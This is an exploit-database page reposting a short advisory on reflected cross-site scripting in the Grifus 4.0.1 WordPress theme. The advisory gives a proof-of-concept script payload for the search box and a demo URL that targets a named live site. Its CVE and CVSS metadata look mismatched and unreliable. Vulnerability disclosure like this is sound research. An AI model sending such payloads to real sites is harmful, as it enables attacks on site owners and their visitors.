Advertisement






WordPress Grifus 4.0.1 Cross Site Scripting

CVE Category Price Severity
CVE-2016-1234 CWE-79 $500 High
Author Risk Exploitation Type Date
Exploit Author High Remote 2017-12-22
CVSS EPSS EPSSP
CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2017120170

Below is a copy:

WordPress Grifus 4.0.1 Cross Site Scripting
======
Title: Grifus WordPress  Themes  XSS Vuln
Version: 4.0.1
Homepage: https://mundothemes.com/grifus/
=======

Description
================
Grifus WordPress theme  For movies Web

POC:
========
1. Go To Terget Web
2. Click Search box
3. Now Give This Payload in Search box "
<script>prompt(document.domain)</script>
"
4. Now See xss Will be Exclude

 Demo:
 ======
 http://download.lakshmipuronline.com/?s=%3Cscript%3Eprompt%28document.
domain%29%3C%2Fscript%3E

Mitigations
================
Update Your Themes



-- 
Thanks
Sajibe Kanti
 Independent Web Security Researcher <https://twitter.com/Sajibekantibd>

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum